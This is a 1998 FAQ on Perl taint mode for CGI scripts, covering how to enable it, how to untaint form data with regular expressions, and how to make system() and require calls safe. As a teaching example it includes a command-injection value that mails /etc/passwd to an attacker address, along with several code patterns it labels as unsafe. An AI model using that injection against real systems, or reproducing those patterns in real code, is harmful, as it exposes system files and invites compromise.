CGI/Perl Taint Mode FAQ

CGI/Perl Taint Mode FAQ
Gunther Birznieks <gunther@clark.net>
Version 1.0, June 3, 1998

Table of Contents

What is taint mode? Why do I need it?

How do I use taint mode in my CGI/Perl Script?

How do I use taint mode on non-UNIX servers?

Once I activate taint mode is that it?

OK, so what are the details on what I need to change?

Do I have to untaint all my variables?

If I "know" my variable is safe, why don't I just clear taint mode?

How do I fix system() calls in taint mode?

How do I fix problems with require or use statements in taint mode?

Some more taint mode tips.

Acknowledgements.

What is taint mode? Why do I need it?

Freeware CGI Scripts are available for download all over the Web. But how many of them are really secure? When you download a script do you check all the logic to make sure it is secure? Do you read through each line of code and anticipate all the ramifications? Most of the time the answer is "no". After all, the whole point of downloading software is to get it and run it for free WITHOUT having to do a lot of work.
I'm writing this to tell you that there isn't any free lunch out there. The more complicated a CGI script is, the more likely you will want to find someone else who has already programmed it and avoid doing the work yourself.
The problem is that regardless of how good the author is, every large program has a good probability of having bugs -- some of them may be security bugs.
One very good way to lock out security bugs in Perl code is to turn on TAINT mode. TAINT mode puts a Perl script into "PARANOID" mode and treats ALL user supplied input as tainted and bad unless the programmer explicitly "OKs" the data.
How do I use taint mode in my CGI/Perl script?

If your site has Perl 5 on it, change the line at the top of your CGI script from

#!/usr/local/bin/perl

to

#!/usr/local/bin/perl -T

Note: your path to the Perl executable may vary depending on your server.
If your site has Perl 4 on it, change the line at the top of your CGI script from

#!/usr/local/bin/perl

to

#!/usr/local/bin/taintperl

Notice that Perl 4 does not support the -T flag. Instead, version 4 of Perl distributions typically come with a separate executable altogether, "taintPerl".

Windows NT and other non-UNIX Web servers may have trouble recognizing the first magical line of a Perl script. Executing the first line of a script with the command parameters in there is a UNIXism. Read the next section for issues involved in activating taint mode on WinNT, Win95/98, or Mac.

How do I activate taint mode on non-UNIX servers?

CGI Scripts running on non-UNIX Servers typically do not recognize the magical #!/usr/local/bin/perl first line of the script. Instead, the web server knows what language to execute the server with because of an operating system or web server configuration variable.
For example, for IIS on NT, you should change the association of Perl scripts to run with taint mode on. Unfortunately, this changes the association for ALL your Perl scripts which you may not want.
A more reasonable way is to get around the problem by creating a second extension under NT such as tcgi or tgi and associate it with taint mode Perl. Then, rename the scripts with the new extension to activate taint mode on them.
You could also try using another web server that understand the first line of scripts. For example, SAMBAR v4.1, a freeware NT web server, can be configured to run the script based on the first line of the cgi script. In this case, you would change the first line to read something like the following:

#!c:\perl\bin\perl.exe -T

Once I activate taint mode is that it?

Unfortunately, no.
You should test your script thoroughly to see if turning on taint mode stops anything from occuring. Usually the majority of your script will work fine. In fact if you are lucky, the whole program may work without any changes at all!
The major caveat is that taint mode is not a compile time check. It is a run-time check.
Run-time checking means that taint mode Perl is constantly and vigilantly checking to see if the script is going to do anything unsafe with user input while the program runs. It does not stop checking after the script first compiles (compile-time checking).
Run-time checking means that you need to test all logical paths of execution your script might take so that "legal operations" do not get halted because of taint mode.
OK, So what are the details of what I need to change?

To get an introduction to some basic cases of what taint mode considers "unsafe", I recommend reading the Perl documentation on taint mode.
The O'Reilly "Programming Perl" reference book is a good introductory source of information. The section in the book is called "Handling Insecure Data".
The same basic information in there can also be found on-line in the UNIX distribution of Perl. On UNIX, typing "perldoc perlsec" will bring up the Perl Security documentation.
If you are not using UNIX, there is a possibility that this command will work on your particular operating systems' distribution of Perl anyway. However, if it does not work, you can always look up this information on-line. The "perlsec" guide is located at http://www.perl.com/CPAN/doc/manual/html/pod/perlsec.html.
In addition, Lincoln Stein's WWW-Security FAQ has an excellent introduction to safe scripting in Perl.
On a CGI script, the only user input is basically user submitted form data. It is this user input that the Perl script will consider "tainted".
This does NOT mean that you have to immediately go through a lot of hoops to untaint ALL the form variables that come in. Not only would that be a big pain, but its unnecessary.
Instead, Perl only considers the COMBINATION of form variables plus the use of a potentially "unsafe" operation to be illegal. Potentially "unsafe" operations are operations that have a potentially permanent destructive effect if the wrong parameters are passed.
Potentially unsafe operations include, but are not necessarily limited to, system calls of any sort such as using system(), backticks or piped open() calls, open calls that can write to disk, unlink() which deletes files, and rename().

For the sample code given, it is assumed that the associative array %form_data contains the form data that was passed to the CGI script where the key is the field name and the value is the value of the HTML Form field.
Since this FAQ is meant to be useful for both Perl 4 and 5, I have not used CGI.pm syntax. If you are using Perl 5 and CGI.pm as your library, your tainted variables would be coming out of $query->param() method in the CGI object.
I use "mail" as an example program, but really the examples here apply to any system call with command line parameters. If you actually want to email from CGI scripts you may want to consider the more secure method described further in the system call section of this FAQ.

For example, if $form_data{"email"} is "tainted", then the following would still be legal:

print $form_data{"email"} . "\n";

because the print command is not an unsafe operation.
But if you try to pass the same variable to an unsafe version of a system call

system("mail " . $form_data{"email"});

Perl will complain and not allow this. Making an unsafe system call plus passing form data as a command line argument is terribly unsafe. Consider what would happen if someone entered an email address on the form like

"me@mydomain.com; mail hacker@hack.net < /etc/passwd"

Clearly, there are security ramifications. With taint mode turned on though, the Perl interpreter will stop this from occuring at all. However, Perl can't tell what is in the form_data variable -- it just assumes it is tainted whether it is friendly or not.
Thus, if you want to do that type of command with a user supplied variable, you must always untaint it regardless of whether it contains harmless input or not. Remember, Perl only sees that the string was created as a result of user input (such as a form variable). It has no way of knowing whether the string is safe or not until you untaint it with the techniques listed here.

Even HIDDEN form tags which are not directly entered by a user are considered tainted by Perl. In other words, all form data passed to the CGI script is considered tainted by Perl.

To untaint a variable, you use regular expressions.
The only way to untaint a variable is to do a regular expression match using () groups inside the regular expression pattern match. In Perl, the first () group match gets assigned to $1, the second () group to $2, and so on.
Perl considers these new variables that arise from () groups to be untainted. Once your regular expression has created these variables, you can use them as your new untainted values.
The following will illustrate this:
EMail addresses consist of word characters (a-zA-Z_0-9), dashes, periods and an @ sign. So we want to match this descriptive template. But there is a catch!
If we allow email addresses to have dashes, a lot of programs use dash to signify a command-line parameter! So although we allow dashes in the email address, if you want to be extra careful, make sure that the first character of the email address is only a word character and does not contain dashes or periods. The likelihood that someone really has an email address that begins with a period of dash is relatively low unless they are the singer formerly known as Prince.
Thus, our descriptive template becomes the following:

Match first character as a word character, no extra ones allowed like dashes.
Match 0 or more subsequent characters as word characters which can also include dashes and periods.
Match at least one @ symbol after the preceding two rules.
Match every character (at least one) for the domain name of the email server after the @ symbol. This can consist of word characters, dashes, and periods.

The regular expression for this template minus the grouping () we would use for untainting is:

/\w{1}[\w-.]*\@[\w-.]+/

Further, let us assume that somewhere in the program a variable called $email has been assigned from $form_data{"email"} which contains a value submitted by the user from an HTML form using a statement like the following:

$email = $form_data{"email"};

Notice that $email is now tainted as well. This is because its value arose directly from another variable that contained tainted (user input) data, namely $form_data{"email"}.
So to untaint a variable called $email, you would do the following with a regular expression.

if ($email =~ /(\w{1}[\w-.]*)\@([\w-.]+)/) { $email = "$1\@$2"; } else { warn ("TAINTED DATA SENT BY $ENV{'REMOTE_ADDR'}: $email: $!"); $email = ""; # successful match did not occur }

OK. Let's go over this in a little more detail.
Basically, when you use () inside a regular expression, each group of parentheses is mapped to a $# variable where # is the number mapped to however many groups you have. For example, the first set of parenthesis that matches in the regular expression is referred to as $1.
In the above example, the first parentheses surround (\w{1}[\w-.]*). This matches one or more word characters, dashes, and periods with at least one word character before it which does not contain dashes or periods. Because of the parentheses, this first match gets assigned to $1 by Perl.
Then, an @ symbol is matched.
Finally, the second set of parentheses ([\w-.]+) matches one or more of any word characters, dashes, and periods. This second match gets assigned to $2 by Perl.
If the regular expression is successful, $1 (first parenthetical match) will equal the username portion of the email address and $2 (second parenthetical match) will equal the domain portion.
Thus, the next command, $email = "$1\@$2"; replaces the previously tainted email variable with the safe counterparts: $1 followed by an @ symbol followed by $2.
Notice that $1 and $2 are both considered untainted now. This is very important to see.
Yes, they did arise from the user input data, but Perl considers these variables special. Perl basically believes that because they resulted from a regular expression you set up, that you have explicitly checked the data for validity in that regular expression. Thus, $1 and $2 are not considered tainted.
On the other hand, if the user entered an email address that did not match this "template", $1 and $2 will equal nothing because the regular expression will have failed. The example above would assign $email = "" in this case as part of the else {} clause.
Of course, if the user is trying to hack your system, this is a good thing. You only want valid email addresses to come through. You should generally check for the failure of the regular expression as was done above by the else {} clause and do something about the bad data.
As an additional plus, checking for the failure of the regular expression allows you to use something like warn to print an informational message to STDERR about the variable that did not pass along with the IP address that tried to pass it as I have done in the above example.
When a CGI script prints to STDERR, that output goes to your errorlog. You should always check your errorlog for potential hack attempts. Of course, you could always be more sophisticated such as email the bad data directly to you so you would be notified right away. Also, if you are really worried about your program's integrity, you could use die() instead of warn() to stop the program rather than quietly warning you.

If you are doing more than one taint check, if the second taint check fails, the previous values of $# (eg $1 or $2) will remain what they were before.
Unless you are sure that this is the only variable you are taint checking, it is best to check the match with an IF/ELSE statement as demonstrated above.

Do I have to untaint all my variables?

No.
Both of the following must happen before you have to worry about untainting a variable.
[1] The variable was assigned based on user input. Or the variable was assigned from a variable that was tainted itself.
AND
[2] The variable will be used in a way that could compromise system safety such as writing a file.
For example, the following is OK because printing to the STDOUT is not an unsafe operation even though the variable came from a form variable.

# %form_data contains an associative array # of values the user entered on a form # # This is SAFE, printing is a safe operation # regardless of user input or not. # $filename = $form_data{"session_file"}; print "The filename was $filename\n";

In addition, the following is OK, because although the file is being opened for writing (a potentially unsafe operation), the filename variable was assigned within the program NOT as a result of user input.

# SAFE, FILENAME is assigned in the program itself $filename = "./TempFiles/mytempfile.dat"; open (TEMP, ">$filename");

However, the following IS unsafe because the variable came from user input AND it is being used in a potentially unsafe operation -- opening a file for writing.
Note, opening a file for writing is unsafe because if the filename is corrupt, then the user input could tell the script to write over ANY file in the system which is a huge security hole.

# UNSAFE!!! Taint Will Complain! $filename = $form_data{"session_file"}; open (SESSION, ">$filename");

The easiest way to test if taint mode is having a problem with a particular form variable is to simply activate taint mode as described earlier and then test the program.
Any errors that result in the script not executing will be caught and logged in your web server's errorlog. This should be the number one place you look at to troubleshoot taint mode.
Here are some common unsafe operations which will stop the Perl program from executing if user input used with them is not untainted first:

Unsafe System() calls (discussed as a special case below).
Require()ing library files
Anything that writes to the file system such as open with > or >>, unlink, rename

If I "know" my variable is safe, why don't I just clear taint mode?

DON'T DO THIS!!!
Perl probably has a good reason for thinking the input is unsafe. For example, there is a common misconception that HIDDEN INPUT tags on a FORM that are generated by a CGI script is "safe". This is not true! A user could easily mimic your form by making their own HTML form with bogus values.
Taint mode will catch all this. Avoid the temptation to quickly dismiss a tainted variable by using an "open" Regular expression.
THE FOLLOWING IS BAD AND SHOULD NOT BE DONE:

$email =~ /(.*)/; $email = $1;

This will match ANY expression. Thus, effectively no check has actually been done.
Recall that Perl considers $1 to be safe now because it trusts that you tested the validity of the variable using the regular expression. Perl does not judge your regular expression. If you choose to make it too loose like the above regular expression, then Perl will let you.
If you do this, you are short changing the point of taint mode which is to make you sit down and think "What input do I really want and how do I restrict myself to JUST that set of characters?".
How do I fix system() calls in taint mode?

When you make a system call to an external program or use its sister command, exec, taint mode also stops this from happening if the PATH has not been adjusted. Again, since a string is being passed to the system call, Perl generally has trouble figuring out whether a relative or absolute path to a command has been passed. Being in "paranoid" mode, Perl stops the command from executing.
The way around this problem is to clear the PATH environment variable so that Perl can trust that the command passed as a system call is an absolute path to a command instead of being part of the search path.
You might ask "What is unsafe about the path?". Historically, path's are considered unsafe because if there are multiple versions of an executable, it is difficult to tell which one is actually being executed. If there is a bug in one of the versions, then this can pose a security hazard.
Basically, before doing a system call, clear the PATH by issuing a statement like the following

$ENV{"PATH"} = "";

Note, this does not just apply to the system() call. It also applies to opening up files with the | symbol (which executes a command) or using backticks `` to execute an external command. Of course, now you will need to call the command using an absolute path.
By the way, some system calls are more secure than others. The example given before, system("mail $email"), is insecure. Behind the scenes, Perl takes a single string argument to system() and passes it to a shell for parsing if there are any shell interpretable meta characters.
But system("mail", $email) is secure because it does not spawn a shell to execute the command. The reason it does not spawn a shell is that each argument has been preprocessed by the programmer into separate strings. Thus, Perl does bother passing the string to a shell for processing. Thus, the $email variable will not have a chance of being executed as a command as part of the shell processing step.

I strongly advise untainting the variables passed to system() even if you use the "safer" separated arguments version of the system() call.
It is entirely possible that the program you are calling via a system() call actually calls other programs or uses the data passed to it in an unsafe way. In turn those programs may call other programs very much like the Russian dolls that expose yet another doll every time one is opened.
It doesn't take much extra coding to untaint variables and be "safe rather than sorry".

Another quick security note. Typically instead of passing $email as a parameter to mail, it is more secure to open up a pipe to the sendmail program with a "-t" parameter. This makes sendmail accept the To: and From: email addresses as STDIN instead of command line parameters. The mail-lib.pl library from the Selena Sol Scripts Archive uses this more secure method of sending email.
How do I fix problems with require or use statements in taint mode?

The Perl require and use statements also change slightly when taint mode is turned on. Basically, the path to load libraries/modules no longer contains "." (the current directory) from its path.
So if you load any libaries or modules relative to the current working directory without explicitly specifying the path, your script will break under taint mode.
To further illustrate this, normally you can read a setup file in the current working directory in a CGI script with a command like:

require "myscript.setup";

However, this will not work when taint mode is on. Instead, you must tell the require statement explicitly where to load the library since "." is removed during taint mode from the @INC array.
@INC contains a list of valid paths to read library files and modules from.
If taint mode is on, you would simply change the above require code to the following:

require "./myscript.setup";

This lets Perl know that the myscript.setup will be explicitly loaded from the current directory. Alternatively, you could add the following command:
use lib qw(.);

"use lib" tells Perl to add the list of passed directory names inside qw() to the @INC array.
You may be wondering why I advocate adding the capability of loading relative libraries back into the script when taint mode is turned on. After all, isn't taint mode doing this to protect me? What is taint mode protecting?
Well, the issue with @INC is really more of a problem with SUID scripts than CGI scripts. When you have an SUID script that can execute with the permissions of another user (such as root), Perl goes into taintmode automatically.
For this SUID script case, it would be a huge security breach to have the capability of loading libraries from the user's current directory. If a script ends up having a bug where the library is not found in the normal directory path, then a user could exploit this by writing their own, malicious version of the library, putting it in the current directory, and running the SUID script from their current directory.
However, this is not really the same problem with CGI scripts. User's are not executing your script from arbitrary directories. Your web server controls which directory the script is called from. So keeping "." in @INC is not really a problem compared to SUID scripts which operate under taint mode automatically.
Some more taint mode tips

[1] Consider logging bad taint/regular expression matches.
If your taint cleaning results in a bad regular expression match, you might want to set up code to detect this and log it or email this fact to you. That way, you can see if people are trying to hack your script.
[2] Use the web server's errorlog.
If you turn on taint mode and there is a problem occuring so the script does not seem to work, you can find out the specifics behind the problem by examining your server's errorlog. Encourage your ISP to help you secure your scripts by giving you access to errorlogs if you don't have it.
A smart ISP will encourage safe CGI scripting practices. If they don't, you don't want that ISP since other users may be developing unsafe CGI on your virtual web server.
[3] There's more to safe CGI scripting than taint mode.
Always be vigilant. There may be other holes. For example, the "Russian Doll" scenario that I outlined above could get past taint mode.
Taint mode helps a LOT, but it is not the end of safe CGI scripting. Always ask yourself, "Is there a way someone could break through this?"
[4] Read other WWW Security references.
Read the WWW-Security FAQ by Lincoln Stein and other security resources. Keeping up with the latest security issues is absolutely crucial to promoting safe CGI.
Acknowledgements

The following have helped with the creation of this FAQ by providing valuable feedback during its development: Anthony Masiello, Joseph Ryan, Ignacio Bustamante, Fred Taheri, Mark McDonald, Dan Berkowitz, Peter Chines, Selena Sol.